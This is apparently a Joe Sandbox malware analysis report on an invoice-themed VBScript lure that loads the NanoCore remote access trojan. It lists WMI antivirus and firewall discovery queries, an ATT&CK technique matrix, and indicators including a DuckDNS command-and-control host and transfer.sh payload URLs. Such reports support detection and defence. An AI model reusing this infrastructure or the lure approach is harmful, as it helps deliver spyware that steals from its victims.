Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: aspnet_compiler.exe, 00000011.00000003.858400687.000000000136B000.00000004.00000001.sdmp

String found in binary or memory: NanoCore.ClientPluginHost

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Registry Run Keys / Startup Folder1	Process Injection211	Masquerading1	OS Credential Dumping	Query Registry1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter11	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scripting221	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion21	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Logon Script (Mac)	Process Injection211	NTDS	Virtualization/Sandbox Evasion21	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting221	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol13	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery12	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.m	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://crl.micrX	0%	Avira URL Cloud	safe
http://crl.micr	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
newjan.duckdns.org	194.147.140.20	true	true		unknown
transfer.sh	144.76.136.153	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://transfer.sh/pNpqqh/yghtf.txt	false		high
https://transfer.sh/5mLV5X/nyuh.txt	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.m	powershell.exe, 00000003.00000002.830219720.000001BAC5755000.00000004.00000040.sdmp	false	URL Reputation: safe	unknown
http://www.m.com/pki/certs/MPCA_2010-07-01.c	powershell.exe, 00000003.00000003.704652441.000001BADF721000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.832249424.000001BAC734B000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.832935033.000001BAC74E6000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.832249424.000001BAC734B000.00000004.00000001.sdmp	false		high
http://crl.micrX	powershell.exe, 00000003.00000003.704652441.000001BADF721000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.832935033.000001BAC74E6000.00000004.00000001.sdmp	false		high
https://transfer.sh	powershell.exe, 00000003.00000002.832249424.000001BAC734B000.00000004.00000001.sdmp	false		high
http://crl.micr	powershell.exe, 00000003.00000003.704652441.000001BADF721000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.830844312.000001BAC7091000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.832249424.000001BAC734B000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
144.76.136.153	transfer.sh	Germany		24940	HETZNER-ASDE	false
194.147.140.20	newjan.duckdns.org	unknown		47285	PTPEU	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483205
Start date:	14.09.2021
Start time:	16:46:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	14 Items receipt.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@8/10@26/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.107.246.254, 13.107.3.254, 52.113.196.254, 20.82.209.183, 20.54.110.249, 40.112.88.60, 173.222.108.210, 173.222.108.226, 80.67.82.211, 80.67.82.235 Excluded domains from analysis (whitelisted): s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, teams-9999.teams-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, t-ring.msedge.net, s-ring.s-9999.s-msedge.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, store-images.s-microsoft.com, s-9999.s-msedge.net, teams-ring.teams-9999.teams-msedge.net, t-ring.t-9999.t-msedge.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtQueryVolumeInformationFile calls found. Report size getting too big, too many NtSetInformationFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/483205/sample/14 Items receipt.vbs

Simulations

Behavior and APIs

Time	Type	Description
16:47:20	API Interceptor	28x Sleep call for process: powershell.exe modified
16:48:27	API Interceptor	1470x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
144.76.136.153	Receipt_12203.vbs	Get hash	malicious	Browse	transfer.sh/get/E2oQCW/Server.txt
	Invoice #60122.vbs	Get hash	malicious	Browse	transfer.sh/get/Vp6k0P/Server.txt
	M00GS82.vbs	Get hash	malicious	Browse	transfer.sh/get/QipjYs/fOOFFK.txt
	#P0082.vbs	Get hash	malicious	Browse	transfer.sh/get/4YgL52/HJN.txt
	Invoice #33190.vbs	Get hash	malicious	Browse	transfer.sh/get/1jDQCmj/trivago.txt
	ZHDJFEB83MK.vbs	Get hash	malicious	Browse	transfer.sh/15cCRXY/KFKFKF.txt
	#W002.vbs	Get hash	malicious	Browse	transfer.sh/1YKpmfw/HmS.txt
	WOO62_InvoiceCopy.vbs	Get hash	malicious	Browse	transfer.sh/p/SHJA.txt
	A719830-Paid-Receipt.vbs	Get hash	malicious	Browse	transfer.sh/b/deef.txt
	S0187365-Paid-Receipt.vbs	Get hash	malicious	Browse	transfer.sh/1w231Gc/eeff.txt
	X92867354_PAYMENT_RECEIPT.vbs	Get hash	malicious	Browse	transfer.sh/1cKLmWw/defff.txt
	H6289_Payment_Invoice_.vbs	Get hash	malicious	Browse	transfer.sh/bypass.txt
	W00903InvoicePayment.vbs	Get hash	malicious	Browse	transfer.sh/1Qh4UR2/defender.txt
	R73981_Payment_Invoice_.vbs	Get hash	malicious	Browse	transfer.sh/1yD4k6Q/ftf.txt
	S83735478_Payment_Invoice.vbs	Get hash	malicious	Browse	transfer.sh/1WFWzN7/defender.txt
	D37186235_Payment_Invoice.vbs	Get hash	malicious	Browse	transfer.sh/1RzUlWk/defender.txt
	In_WO072.vbs	Get hash	malicious	Browse	transfer.sh/1RKyZ9I/hjdds.txt
	FDOCX3429067800.vbs	Get hash	malicious	Browse	transfer.sh/1AeAeyx/defender.txt
	W092.vbs	Get hash	malicious	Browse	transfer.sh/1DiufNP/JKS.txt
	Texas Windstorm Insurance upgrade package.vbs	Get hash	malicious	Browse	transfer.sh/get/1R86ggs/defender.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
newjan.duckdns.org	16 Items receipt.vbs	Get hash	malicious	Browse	194.147.140.20
	41-Items-invoice.vbs	Get hash	malicious	Browse	194.147.140.20
	8 Items invoice.vbs	Get hash	malicious	Browse	194.147.140.20
	3G1J49A6V_Invoice.vbs	Get hash	malicious	Browse	185.244.30.23
	LxYbtlP5nB.exe	Get hash	malicious	Browse	185.244.30.23
	Invoice#282730.exe	Get hash	malicious	Browse	79.134.225.9
	Urban Receipt.exe	Get hash	malicious	Browse	79.134.225.9
	d9hGzIR8mh.exe	Get hash	malicious	Browse	194.5.97.75
	6554353_Payment_Invoice.exe	Get hash	malicious	Browse	194.5.97.75
transfer.sh	16 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	41-Items-invoice.vbs	Get hash	malicious	Browse	144.76.136.153
	12-items-receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	8 Items invoice.vbs	Get hash	malicious	Browse	144.76.136.153
	Receipt_12203.vbs	Get hash	malicious	Browse	144.76.136.153
	Payment_Advoce.vbs	Get hash	malicious	Browse	144.76.136.153
	Payment_Advoce.vbs	Get hash	malicious	Browse	144.76.136.153
	Invoice #60122.vbs	Get hash	malicious	Browse	144.76.136.153
	83736354Invoicereceipt.vbs	Get hash	malicious	Browse	144.76.136.153
	Invoice52190.vbs	Get hash	malicious	Browse	144.76.136.153
	M00GS82.vbs	Get hash	malicious	Browse	144.76.136.153
	Invoice#52190.vbs	Get hash	malicious	Browse	144.76.136.153
	Payment_Advoce.vbs	Get hash	malicious	Browse	144.76.136.153
	8373543_Invoice_Receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	A6D8N25S_Invoice_receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	Invoice#1096.vbs	Get hash	malicious	Browse	144.76.136.153
	Receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	#P0082.vbs	Get hash	malicious	Browse	144.76.136.153
	Services Needed.vbs	Get hash	malicious	Browse	144.76.136.153
	Remittance-20210830.vbs	Get hash	malicious	Browse	144.76.136.153

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	16 Items receipt.vbs	Get hash	malicious	Browse	144.76.136.153
	diagram-129.doc	Get hash	malicious	Browse	136.243.74.161
	diagram-129.doc	Get hash	malicious	Browse	136.243.74.161
	i3UmAT06iE.exe	Get hash	malicious	Browse	195.201.225.248
	cd.exe	Get hash	malicious	Browse	168.119.139.96
	diagram-129.doc	Get hash	malicious	Browse	136.243.74.161
	GCw589FSm7.exe	Get hash	malicious	Browse	195.201.225.248
	jFQ6SEAt26	Get hash	malicious	Browse	49.13.162.183
	67d16a17f27f15cf21671ccb406e1e8b647aaf90c72c9.exe	Get hash	malicious	Browse	195.201.225.248
	diagram-477.doc	Get hash	malicious	Browse	136.243.74.161
